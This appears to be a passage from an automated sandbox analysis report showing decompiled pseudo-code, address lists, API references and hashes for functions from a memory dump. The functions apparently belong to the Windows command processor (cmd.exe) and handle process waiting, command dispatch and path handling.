Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID: `jw
API String ID: 1445889803-3047169340
Opcode ID: bc72086c617a774d86b6499d59f3488c326f4b5892f9bb96cf2264e28a0e50e3
Instruction ID: 7fd864098a64a32bf4b6766243b59cbd0189ee58f4ee3720b4a6e5586fadc026
Opcode Fuzzy Hash: bc72086c617a774d86b6499d59f3488c326f4b5892f9bb96cf2264e28a0e50e3
Instruction Fuzzy Hash: CA112E71D05208EBCF21DFB8DA4869EB7F9FF48315F5249A6D405EB260E7309A418B41

Uniqueness

Uniqueness Score: -1.00%

Function 00344C3E, Relevance: 10.5, APIs: 7, Instructions: 42
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00344C3E() {
				long _v8;
				int _t8;
				void* _t15;
				void* _t18;

				_push(_t15);
				_v8 = _v8 | 0xffffffff;
				_t18 = _t15;
				 *0x35d0db = 0;
				WaitForSingleObject(_t18, 0xffffffff);
				_t8 = GetExitCodeProcess(_t18,  &_v8);
				if(_v8 == 0xc000013a) {
					EnterCriticalSection( *0x363858);
					 *0x35d544 = 1;
					LeaveCriticalSection( *0x363858);
					fflush(E00347721(fprintf(E00347721(_t8, 2), "^C"), 2));
				}
				 *0x35d0db = 1;
				CloseHandle(_t18);
				return _v8;
			}

0x00344c43
0x00344c44
0x00344c49
0x00344c4b
0x00344c55
0x00344c60
0x00344c6d
0x0034ee57
0x0034ee63
0x0034ee6d
0x0034ee8f
0x0034ee95
0x00344c74
0x00344c7b
0x00344c88

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,00357929,00000000,00359313,00000000,00000000,?,00349814,00000000), ref: 00344C55
GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00357929,00000000,00359313,00000000,00000000,?,00349814,00000000), ref: 00344C60
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00357929,00000000,00359313,00000000,00000000,?,00349814,00000000), ref: 00344C7B
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00357929,00000000,00359313,00000000,00000000,?,00349814,00000000), ref: 0034EE57
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00357929,00000000,00359313,00000000,00000000,?,00349814,00000000), ref: 0034EE6D
fprintf.MSVCRT ref: 0034EE81
fflush.MSVCRT ref: 0034EE8F

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
String ID:
API String ID: 4271573189-0
Opcode ID: 194f679c416578af91a74265caa8e86eba519dea72ceee42ecbb0929d80b12ed
Instruction ID: 32a400625e8b670f134bf985addd9642f3e9da1c0ba171884f0575cd249ab3dd
Opcode Fuzzy Hash: 194f679c416578af91a74265caa8e86eba519dea72ceee42ecbb0929d80b12ed
Instruction Fuzzy Hash: 35018431405208FFDB23BBA4AC4DB993BACEB09326F100746F418961F1CBB11A408761

Uniqueness

Uniqueness Score: -1.00%

Function 003407C0, Relevance: 9.4, APIs: 6, Instructions: 361
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E003407C0(void* __ebx, long __ecx, intOrPtr _a4) {
				intOrPtr _v0;
				void* _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				short _v564;
				char _v576;
				char* _v580;
				char _v1100;
				void* _v1104;
				long _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr* _v1120;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				int _t75;
				long _t78;
				signed short* _t81;
				signed short _t90;
				intOrPtr* _t91;
				short* _t96;
				char* _t97;
				intOrPtr _t100;
				intOrPtr _t103;
				wchar_t* _t104;
				long _t107;
				signed int _t108;
				signed char _t120;
				long _t121;
				wchar_t* _t126;
				int _t127;
				void* _t129;
				wchar_t* _t130;
				signed short* _t141;
				wchar_t* _t158;
				wchar_t* _t163;
				signed int _t167;
				signed int _t171;
				long _t175;
				void* _t176;
				signed int _t179;
				void* _t180;
				void* _t184;
				void* _t186;
				signed int _t187;
				int _t188;
				signed int _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				signed int _t193;
				void* _t194;
				void* _t196;
				signed int _t197;
				void* _t199;
				void* _t200;

				_push(0xfffffffe);
				_push(0x35bd98);
				_push(E00347290);
				_push( *[fs:0x0]);
				_t200 = _t199 - 0x450;
				_t70 =  *0x35d0b4; // 0xd59bd0e8
				_v12 = _v12 ^ _t70;
				_t71 = _t70 ^ _t197;
				_v32 = _t71;
				_push(__ebx);
				_push(_t71);
				 *[fs:0x0] =  &_v20;
				_t175 = __ecx;
				_v1108 = __ecx;
				_v1112 = 0;
				GetConsoleTitleW( &_v564, 0x104);
				if( *(_t175 + 0x38) == 0) {
					L88:
					_t75 = 1;
					goto L44;
				} else {
					E00340D51( &_v1100);
					if(_v576 == 0) {
						_t78 = 0x104;
					} else {
						_t78 = 0x7fe7;
					}
					if(E00340C70( &_v1100, _t78) < 0) {
						L87:
						E00340DE8(_t79,  &_v1100);
						goto L88;
					} else {
						_t81 =  *(_t175 + 0x38);
						if(_t81[1] == 0x3a) {
							_t140 =  *_t81;
							if(E003429BB( *_t81) == 0) {
								_push(0);
								_push(0xf);
								goto L83;
							} else {
								_t140 =  *( *(_t175 + 0x38));
								if(E00346A96( *( *(_t175 + 0x38))) != 0) {
									_push(0);
									_push(GetLastError());
									L83:
									_t79 = E0033C5A2(_t140);
									goto L86;
								} else {
									_t187 = towupper( *( *(_t175 + 0x38)) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
									_t141 =  *(_t175 + 0x38);
									_t55 =  &(_t141[1]); // 0x2
									_t169 = _t55;
									do {
										_t90 =  *_t141;
										_t141 =  &(_t141[1]);
									} while (_t90 != 0);
									if(_t141 - _t169 >> 1 == 2) {
										_t91 = E003593E2(_t187, _t169);
										goto L90;
									} else {
										goto L65;
									}
								}
							}
							goto L44;
						} else {
							_t169 =  &_v1104;
							_t189 = E0033E040(_t175,  &_v1104);
							_v1116 = _t189;
							if(_t189 == 0xffffffff) {
								L65:
								_t188 = E0033C7AA(_t175);
								goto L43;
							} else {
								if(_t189 == 0xfffffffe) {
									goto L87;
								} else {
									_t91 =  *((intOrPtr*)(0x331624 + (_t189 + _t189 * 2) * 8));
									_v1120 = _t91;
									if(_t91 == 0) {
										L90:
										E00340DE8(_t91,  &_v1100);
										_t75 = 0;
										goto L44;
									} else {
										_t96 = _v580;
										if(_t96 == 0) {
											_t96 =  &_v1100;
										}
										 *_t96 = 0x2f;
										_t97 = _v580;
										if(_t97 == 0) {
											_t97 =  &_v1100;
										}
										 *((short*)(_t97 + 2)) = 0;
										if(_v580 == 0) {
											_t169 =  &_v1100;
										}
										_t130 = E0033EA40( *((intOrPtr*)(_t175 + 0x3c)), _t169, 2);
										if(_t189 == 0xa) {
											if(_t130 == 0) {
												goto L12;
											} else {
												_t127 = wcsncmp(_t130, "/", 4);
												_t200 = _t200 + 0xc;
												if(_t127 != 0) {
													goto L14;
												} else {
													goto L12;
												}
											}
										} else {
											L12:
											if(_t189 == 0x1f) {
												L14:
												if(_t130 == 0) {
													L34:
													if(E0033E340(_t175) != 0) {
														E0034100C(_t99, _t99);
													}
													_v8 = 0;
													_t190 = _v1120;
													_push(_t175);
													if(_t190 == E00335F50) {
														_t100 = E00335F50();
													} else {
														if(_t190 == E00336980) {
															_t100 = E00336980();
														} else {
															if(_t190 == E00342360) {
																_t100 = E00342360();
															} else {
																if(_t190 != E00339410) {
																	if(_t190 == E003451B0) {
																		_t100 = E003451B0();
																	} else {
																		 *0x3794b4();
																		_t100 =  *_t190();
																	}
																} else {
																	_t100 = E00339410();
																}
															}
														}
													}
													_t188 = _t100;
													_v1112 = _t188;
													_v8 = 0xfffffffe;
													_t93 = E00340BDF(_t100);
													L43:
													E00340DE8(_t93,  &_v1100);
													_t75 = _t188;
													L44:
													 *[fs:0x0] = _v20;
													_pop(_t176);
													_pop(_t186);
													_pop(_t129);
													return E00346FD0(_t75, _t129, _v32 ^ _t197, _t169, _t176, _t186);
												} else {
													while( *_t130 != 0) {
														do {
															_t103 =  *_t191;
															_t191 = _t191 + 2;
														} while (_t103 != 0);
														_t193 = _t191 - _t155 >> 1;
														_t104 = wcschr(_t130, 0x22);
														_t200 = _t200 + 8;
														if(_t104 != 0) {
															memset(0x373f10, 0, 0x1000 << 2);
															_t200 = _t200 + 0xc;
															_t158 = _t130;
															_t46 =  &(_t158[0]); // 0x2
															_t171 = _t46;
															do {
																_t107 =  *_t158;
																_t158 =  &(_t158[0]);
															} while (_t107 != 0);
															_t155 = _t158 - _t171 >> 1;
															_t179 = 0;
															_t108 = 0;
															if(_t155 > 0) {
																do {
																	_t171 =  *(_t130 + _t108 * 2) & 0x0000ffff;
																	if(_t171 != 0x22) {
																		 *(0x373f10 + _t179 * 2) = _t171;
																		_t179 = _t179 + 1;
																	}
																	_t108 = _t108 + 1;
																} while (_t108 < _t155);
															}
															_t180 = _t179 + _t179;
															if(_t180 >= 0x4000) {
																E0034711D(_t108, _t130, _t155, _t171, _t180, _t193);
																_push(_t197);
																_push(_t193);
																_push(_t180);
																_t194 = E00340C70(0x373ab0, ((0 |  *0x373cbc != 0x00000000) - 0x00000001 & 0xffff811d) + 0x7fe7);
																if(_t194 < 0) {
																	_push(_t194);
																	_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																	_push(0x36);
																	goto L101;
																} else {
																	_t162 =  *0x373cb8;
																	if( *0x373cb8 == 0) {
																		_t162 = 0x373ab0;
																	}
																	_t194 = E00346826(_t162,  *0x373cc0, _v0, _a4);
																	if(_t194 < 0) {
																		_push(_t194);
																		_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																		_push(0x37);
																		L101:
																		E0035292C();
																	}
																}
																return _t194;
															} else {
																 *((short*)(_t180 + 0x373f10)) = 0;
																_t169 = 0x373f10;
																goto L20;
															}
														} else {
															_t169 = _t130;
															L20:
															_t196 = _t193 + 1;
															if(_t196 == 0 || _t196 > 0x7fffffff) {
																if(_t196 != 0) {
																	 *_t130 = 0;
																}
															} else {
																_t126 = _t130;
																_t184 = 0x7ffffffe - _t196;
																_t169 = _t169 - _t130;
																while(_t184 + _t196 != 0) {
																	_t167 =  *(_t169 + _t126) & 0x0000ffff;
																	if(_t167 != 0) {
																		 *_t126 = _t167;
																		_t126 =  &(_t126[0]);
																		_t196 = _t196 - 1;
																		if(_t196 != 0) {
																			continue;
																		}
																	}
																	break;
																}
																if(_t196 == 0) {
																	_t126 = _t126 - 2;
																}
																_t155 = 0;
																 *_t126 = 0;
															}
															_t120 = _v1104;
															if((_t120 & 0x00000001) != 0) {
																if(_t130[0] != 0x3a) {
																	goto L29;
																} else {
																	_t155 =  *_t130;
																	if(E003429BB( *_t130) == 0) {
																		_push(0);
																		_push(0xf);
																		goto L85;
																	} else {
																		if(_v1116 == 4) {
																			L71:
																			_t120 = _v1104;
																			goto L29;
																		} else {
																			_t155 =  *_t130;
																			if(E00346A96( *_t130) != 0) {
																				_push(0);
																				_push(GetLastError());
																				goto L85;
																			} else {
																				goto L71;
																			}
																		}
																	}
																}
															} else {
																L29:
																if((_t120 & 0x00000002) != 0) {
																	if( *_t130 != 0x2f) {
																		goto L30;
																	} else {
																		_push(0);
																		_push(0x232a);
																		L85:
																		_t79 = E0033C5A2(_t155);
																		 *0x36b8b0 = 1;
																		L86:
																		goto L87;
																	}
																} else {
																	L30:
																	_t163 = _t130;
																	_t34 =  &(_t163[0]); // 0x2
																	_t169 = _t34;
																	do {
																		_t121 =  *_t163;
																		_t163 =  &(_t163[0]);
																	} while (_t121 != 0);
																	_t130 = _t130 + (_t163 - _t169 >> 1) * 2 + 2;
																	if(_t130 != 0) {
																		continue;
																	} else {
																		break;
																	}
																}
															}
														}
														goto L102;
													}
													_t175 = _v1108;
													goto L34;
												}
											} else {
												_t169 = _t130;
												if(E0033DD2C(_t189, _t130, 1) != 0) {
													goto L87;
												} else {
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L102:
			}

0x003407c5
0x003407c7
0x003407cc
0x003407d7
0x003407d8
0x003407de
0x003407e3
0x003407e6
0x003407e8
0x003407eb
0x003407ee
0x003407f2
0x003407f8
0x003407fa
0x00340800
0x00340816
0x00340820
0x0034cc7e
0x0034cc7e
0x00000000
0x00340826
0x0034082c
0x00340838
0x0034cc3d
0x0034083e
0x0034083e
0x0034083e
0x00340851
0x0034cc73
0x0034cc79
0x00000000
0x00340857
0x00340857
0x0034085f
0x00340b1a
0x00340b24
0x0034cc47
0x0034cc49
0x00000000
0x00340b2a
0x00340b2d
0x00340b37
0x0034cc4d
0x0034cc55
0x0034cc56
0x0034cc56
0x00000000
0x00340b3d
0x00340b51
0x00340b54
0x00340b57
0x00340b57
0x00340b60
0x00340b60
0x00340b63
0x00340b66
0x00340b72
0x0034cc8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00340b72
0x00340b37
0x00000000
0x00340865
0x00340865
0x00340872
0x00340874
0x0034087d
0x00340b78
0x00340b7f
0x00000000
0x00340883
0x00340886
0x00000000
0x0034088c
0x0034088f
0x00340896
0x0034089e
0x0034cc8f
0x0034cc95
0x0034cc9a
0x00000000
0x003408a4
0x003408a4
0x003408ac
0x0034cca1
0x0034cca1
0x003408b7
0x003408ba
0x003408c2
0x0034ccac
0x0034ccac
0x003408ca
0x003408d6
0x0034ccb7
0x0034ccb7
0x003408e6
0x003408eb
0x00340a68
0x00000000
0x00340a6e
0x00340a76
0x00340a7c
0x00340a81
0x00000000
0x00340a87
0x00000000
0x00340a87
0x00340a81
0x003408f1
0x003408f1
0x003408f4
0x00340909
0x0034090b
0x003409d1
0x003409da
0x003409de
0x003409de
0x003409e3
0x003409ea
0x003409f0
0x003409f7
0x00340a24
0x003409f9
0x003409ff
0x00340aef
0x00340a05
0x00340a0b
0x00340af9
0x00340a11
0x00340a17
0x00340b09
0x00340b86
0x00340b0b
0x00340b0d
0x00340b13
0x00340b13
0x00340a1d
0x00340a1d
0x00340a1d
0x00340a17
0x00340a0b
0x003409ff
0x00340a29
0x00340a2b
0x00340a31
0x00340a38
0x00340a3d
0x00340a43
0x00340a48
0x00340a4a
0x00340a4d
0x00340a55
0x00340a56
0x00340a57
0x00340a65
0x00340911
0x00340911
0x00340920
0x00340920
0x00340923
0x00340926
0x0034092d
0x00340932
0x00340938
0x0034093d
0x00340a98
0x00340a98
0x00340a9a
0x00340a9c
0x00340a9c
0x00340aa0
0x00340aa0
0x00340aa3
0x00340aa6
0x00340aad
0x00340aaf
0x00340ab1
0x00340ab5
0x00340ab7
0x00340ab7
0x00340abe
0x00340ac0
0x00340ac8
0x00340ac8
0x00340ac9
0x00340aca
0x00340ab7
0x00340ace
0x00340ad6
0x00340bf7
0x00340bfe
0x00340c09
0x00340c0e
0x00340c26
0x00340c2a
0x0034cd24
0x0034cd25
0x0034cd2a
0x00000000
0x00340c30
0x00340c30
0x00340c38
0x00340c5d
0x00340c5d
0x00340c4b
0x00340c4f
0x0034cd2e
0x0034cd2f
0x0034cd34
0x0034cd36
0x0034cd3a
0x0034cd3a
0x00340c4f
0x00340c5a
0x00340adc
0x00340ade
0x00340ae5
0x00000000
0x00340ae5
0x00340943
0x00340943
0x00340945
0x00340945
0x00340948
0x0034cccc
0x0034ccd4
0x0034ccd4
0x0034095a
0x0034095a
0x00340961
0x00340963
0x00340965
0x0034096c
0x00340973
0x00340975
0x00340978
0x0034097b
0x0034097e
0x00000000
0x00000000
0x0034097e
0x00000000
0x00340973
0x00340982
0x0034ccc2
0x0034ccc2
0x00340988
0x0034098a
0x0034098a
0x0034098d
0x00340996
0x00340b95
0x00000000
0x00340b9b
0x00340b9b
0x00340ba5
0x0034cc5d
0x0034cc5f
0x00000000
0x00340bab
0x00340bb2
0x00340bc4
0x00340bc4
0x00000000
0x00340bb4
0x00340bb4
0x00340bbe
0x0034ccdc
0x0034cce4
0x00000000
0x00000000
0x00000000
0x00000000
0x00340bbe
0x00340bb2
0x00340ba5
0x0034099c
0x0034099c
0x0034099e
0x00340bd4
0x00000000
0x00340bda
0x0034ccea
0x0034ccec
0x0034cc61
0x0034cc61
0x0034cc66
0x0034cc70
0x00000000
0x0034cc70
0x003409a4
0x003409a4
0x003409a4
0x003409a6
0x003409a6
0x003409b0
0x003409b0
0x003409b3
0x003409b6
0x003409c2
0x003409c5
0x00000000
0x00000000
0x00000000
0x00000000
0x003409c5
0x0034099e
0x00340996
0x00000000
0x0034093d
0x003409cb
0x00000000
0x003409cb
0x003408f6
0x003408f8
0x00340903
0x00000000
0x00000000
0x00000000
0x00000000
0x00340903
0x003408f4
0x003408eb
0x0034089e
0x00340886
0x0034087d
0x0034085f
0x00340851
0x00000000

APIs

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,D59BD0E8,00000001,?), ref: 00340816

Part of subcall function 00340D51: memset.MSVCRT ref: 00340D7D

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

towupper.MSVCRT ref: 00340B44

Part of subcall function 0033E040: memset.MSVCRT ref: 0033E090
Part of subcall function 0033E040: wcschr.MSVCRT ref: 0033E0F3
Part of subcall function 0033E040: wcschr.MSVCRT ref: 0033E10B
Part of subcall function 0033E040: _wcsicmp.MSVCRT ref: 0033E179

wcschr.MSVCRT ref: 00340932
wcsncmp.MSVCRT(00000000,0033218C,00000004,00000002,00007FE7), ref: 00340A76

Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EAB7
Part of subcall function 0033EA40: iswspace.MSVCRT ref: 0033EB2D
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB49
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB6D

Part of subcall function 00336980: _get_osfhandle.MSVCRT ref: 00336A06
Part of subcall function 00336980: GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00336A10
Part of subcall function 00336980: _wcsnicmp.MSVCRT ref: 00336A3D
Part of subcall function 00336980: _get_osfhandle.MSVCRT ref: 00336A64
Part of subcall function 00336980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00336A6E
Part of subcall function 00336980: _get_osfhandle.MSVCRT ref: 00336A8E
Part of subcall function 00336980: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00336AA0
Part of subcall function 00336980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 00336AC0
Part of subcall function 00336980: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 00336AD1
Part of subcall function 00336980: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0035D620,00000200,00000000,00000000), ref: 00336AE7
Part of subcall function 00336980: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 00336AF4

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0034CCDE

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcschr$File$_get_osfhandlememset$LockPointerShared$AcquireConsoleErrorLastReadReleaseSizeTitleType_wcsicmp_wcsnicmpiswspacetowupperwcsncmp
String ID:
API String ID: 1803274588-0
Opcode ID: 3ec9a42749b302367493966dbc5a145ad0f0859fdb13a8809c327b87a1b7e6e8
Instruction ID: 083d9b8739aef87c4a37e33dffc65da8e45e0caea8ce47a5e869e4dabdbbb738
Opcode Fuzzy Hash: 3ec9a42749b302367493966dbc5a145ad0f0859fdb13a8809c327b87a1b7e6e8
Instruction Fuzzy Hash: 9CC13831B002158BDB6BAB28CD957BA73E4EF40300F154579EA0E9F691EB70BD85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00344800, Relevance: 9.3, APIs: 6, Instructions: 327
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00344800(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				int _v28;
				char _v32;
				void* _v36;
				void _v556;
				int _v564;
				char _v568;
				void* _v572;
				void _v1092;
				char _v1093;
				signed int _v1094;
				signed int* _v1100;
				signed int _v1104;
				signed int* _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t106;
				intOrPtr _t123;
				intOrPtr _t127;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				void* _t136;
				signed int _t137;
				intOrPtr _t138;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr* _t146;
				intOrPtr _t147;
				void* _t148;
				signed int _t153;
				signed int _t154;
				void* _t163;
				intOrPtr* _t164;
				intOrPtr* _t167;
				intOrPtr* _t170;
				signed int _t176;
				signed int* _t177;
				void* _t178;
				intOrPtr* _t186;
				void* _t190;
				signed int _t192;
				signed int _t196;
				void* _t198;
				intOrPtr* _t200;
				void* _t201;
				void* _t202;
				intOrPtr _t203;
				intOrPtr* _t204;
				signed int* _t205;
				signed int _t206;
				signed int _t211;

				_t191 = __edx;
				_t154 = _t211;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t154 + 4));
				_t209 = (_t211 & 0xfffffff8) + 4;
				_t106 =  *0x35d0b4; // 0xd59bd0e8
				_v16 = _t106 ^ (_t211 & 0xfffffff8) + 0x00000004;
				_t200 =  *((intOrPtr*)(_t154 + 0xc));
				_t196 = 0;
				_v564 = 0x104;
				_v1093 = __edx;
				_v1116 = __ecx;
				 *0x373cf0 = 0;
				_v572 = 0;
				_v568 = 1;
				memset( &_v1092, 0, 0x104);
				_v36 = 0;
				_v32 = 1;
				_v28 = 0x104;
				memset( &_v556, 0, 0x104);
				_t156 =  &_v1092;
				if(E00340C70( &_v1092, 0x7fe9) < 0) {
					L74:
					if(_v1093 == 0) {
						L14:
						_t196 = 1;
						L15:
						__imp__??_V@YAXPAX@Z(_v36);
						__imp__??_V@YAXPAX@Z(_v572);
						_pop(_t198);
						_pop(_t201);
						return E00346FD0(_t196, _t154, _v16 ^ _t209, _t191, _t198, _t201);
					}
					_push(_t196);
					_push(0x2374);
					L13:
					E0033C5A2(_t156);
					goto L14;
				}
				_t156 =  &_v556;
				if(E00340C70( &_v556, 0x7fe9) < 0) {
					goto L74;
				}
				_t163 = 0x30;
				_t164 = E003400B0(_t163);
				_v1108 = _t164;
				if(_t164 == 0) {
					L47:
					E00359287(_t164);
					__imp__longjmp(0x36b8b8, 1);
					L48:
					_t165 = 0x373ab0;
					L17:
					E00340D89(_t191, _t165);
					E00345D39();
					_t202 = _v572;
					_t167 = _t202;
					if(_t202 == 0) {
						_t167 =  &_v1092;
					}
					_t191 = _t167 + 2;
					do {
						_t123 =  *_t167;
						_t167 = _t167 + 2;
					} while (_t123 != _t196);
					_t156 = _t167 - _t191 >> 1;
					_v1104 = _t156;
					if(_t156 <= 3) {
						L24:
						if(_t156 + 1 > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(2);
							goto L13;
						}
						_t203 = _v1120;
						_t125 =  *(_t203 + 0x10);
						if( *( *(_t203 + 0x10)) == _t196) {
							_t125 = "*";
						}
						E00340D89(_t191, _t125);
						_t170 = _v36;
						if(_t170 == 0) {
							_t170 =  &_v556;
						}
						_t191 = _t170 + 2;
						do {
							_t127 =  *_t170;
							_t170 = _t170 + 2;
						} while (_t127 != _t196);
						_t156 = _t170 - _t191 >> 1;
						if(_v1104 + 1 + (_t170 - _t191 >> 1) > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(0x6f);
							goto L13;
						}
						if( *( *(_t203 + 0x10)) == _t196) {
							L33:
							_t172 = _v36;
							if(_v36 == 0) {
								_t172 =  &_v556;
							}
							_t132 = E0034297B(_t172);
							_t204 = _v1100;
							 *_t204 = _t132;
							_t173 = _v572;
							if(_v572 == 0) {
								_t173 =  &_v1092;
							}
							_t133 = E0034297B(_t173);
							 *((intOrPtr*)(_t204 + 4)) = _t133;
							_t205 = _v1108;
							if(_t205[1] != _t196) {
								__imp___wcsicmp(_t205[1], _t133);
								if(_t133 == 0) {
									_t205[2] = _t205[2] + 1;
									_t176 = _v1100;
									goto L38;
								}
								_t164 = 0x30;
								_t205 = E003400B0(_t164);
								if(_t205 == 0) {
									goto L47;
								}
								_v1108 = _t205;
								 *_v1108 = _t205;
								_t143 = E0034297B(_v1100[1]);
								_t176 = _v1100;
								_t205[1] = _t143;
								 *_t205 = _t196;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								_t205[2] = 1;
								goto L37;
							} else {
								_t145 = E0034297B(_t133);
								_t176 = _v1100;
								_t205[1] = _t145;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								L37:
								_t205[3] = _t176;
								_t205[4] = _t144;
								L38:
								_t191 = _v1116;
								_t135 = _v1112 + 1;
								_t177 =  *(_t176 + 0xc);
								_v1112 = _t135;
								_v1100 = _t177;
								if(_t135 >  *((intOrPtr*)(_v1116 + 0x48))) {
									goto L15;
								}
								L4:
								_t206 =  *_t177;
								_t192 = _t206;
								_v1104 = _t206;
								_t178 = _t192 + 2;
								do {
									_t136 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t136 != _t196);
								_t191 = _t192 - _t178 >> 1;
								_t137 = E00343121(_t206, _t192 - _t178 >> 1);
								_v1094 = _t137;
								if(_t137 != 0) {
									L8:
									_v1100[2] = _t137;
									if( *((char*)(_t154 + 8)) != 0) {
										_t191 = _t137;
										_t206 = E00344DB8(_t206, _t137);
										E00340040(_v1104);
									}
									_t156 = _t206;
									 *0x373cf0 = _t196;
									_t138 = E00343B5D(_t206, _t191);
									_v1120 = _t138;
									if(_t138 != 1) {
										_t165 =  *0x373cb8;
										if( *0x373cb8 == 0) {
											goto L48;
										}
										goto L17;
									} else {
										if(_v1093 == 0) {
											goto L14;
										}
										_push(_t196);
										_push( *0x373cf0);
										goto L13;
									}
								}
								_t156 =  *0x373cf0;
								if(_t156 != 0) {
									if(_v1093 == 0) {
										goto L14;
									}
									_push(_t196);
									_push(_t156);
									goto L13;
								}
								goto L8;
							}
						}
						_t146 =  *((intOrPtr*)(_t203 + 0x14));
						if(_t146 == 0 ||  *_t146 == _t196) {
							_t186 = _v36;
							if(_t186 == 0) {
								_t186 =  &_v556;
							}
							_t191 = _t186 + 2;
							do {
								_t147 =  *_t186;
								_t186 = _t186 + 2;
							} while (_t147 != _t196);
							_t148 = (_t186 - _t191 >> 1) + 3;
							if(_v1094 != 0) {
								if(_t148 <= 0x7fe7 &&  *((char*)(_t154 + 8)) != 0) {
									E00340CF2(_t191, L".*");
								}
							}
						}
						goto L33;
					}
					if(_v1094 != 0) {
						_t190 = _t202;
						if(_t202 == 0) {
							_t190 =  &_v1092;
						}
						if( *((short*)(E00335846(_t190))) != 0x2e) {
							_t156 = _v1104;
							goto L22;
						} else {
							if(_t202 == 0) {
								_t202 =  &_v1092;
							}
							_t156 = _v1104;
							 *((short*)(_t202 + _t156 * 2 - 4)) = 0;
							goto L24;
						}
					}
					L22:
					if(_t202 == 0) {
						_t202 =  &_v1092;
					}
					 *((short*)(_t202 + _t156 * 2 - 2)) = 0;
					goto L24;
				}
				_t153 = _v1116;
				 *_t200 = _t164;
				_t191 = 1;
				 *_t164 = 0;
				 *((intOrPtr*)(_t164 + 4)) = 0;
				 *((intOrPtr*)(_t164 + 8)) = 1;
				_t177 = _t153 + 0x4c;
				_v1112 = 1;
				_v1100 = _t177;
				if( *((intOrPtr*)(_t153 + 0x48)) < 1) {
					goto L15;
				}
				goto L4;
			}

0x00344800
0x00344803
0x00344805
0x00344806
0x00344811
0x00344815
0x0034481d
0x00344824
0x00344828
0x00344832
0x00344834
0x00344840
0x00344848
0x0034484e
0x00344854
0x0034485a
0x00344861
0x00344869
0x00344871
0x00344875
0x00344881
0x00344889
0x0034489b
0x0034ea9e
0x0034eaa5
0x0034498b
0x0034498d
0x0034498e
0x00344991
0x0034499e
0x003449aa
0x003449ad
0x003449b9
0x003449b9
0x0034eaab
0x0034eaac
0x00344984
0x00344984
0x00000000
0x0034498a
0x003448a6
0x003448b3
0x00000000
0x00000000
0x003448bb
0x003448c1
0x003448c3
0x003448cb
0x0034e940
0x0034e940
0x0034e94c
0x0034e952
0x0034e952
0x003449ca
0x003449d1
0x003449d6
0x003449db
0x003449e1
0x003449e5
0x0034e95c
0x0034e95c
0x003449eb
0x003449ee
0x003449ee
0x003449f1
0x003449f4
0x003449fb
0x003449fd
0x00344a06
0x00344a24
0x00344a2c
0x0034ea90
0x00000000
0x00000000
0x0034ea96
0x0034ea97
0x00000000
0x0034ea97
0x00344a32
0x00344a38
0x00344a3e
0x0034e9b0
0x0034e9b0
0x00344a4b
0x00344a50
0x00344a55
0x0034e9ba
0x0034e9ba
0x00344a5b
0x00344a5e
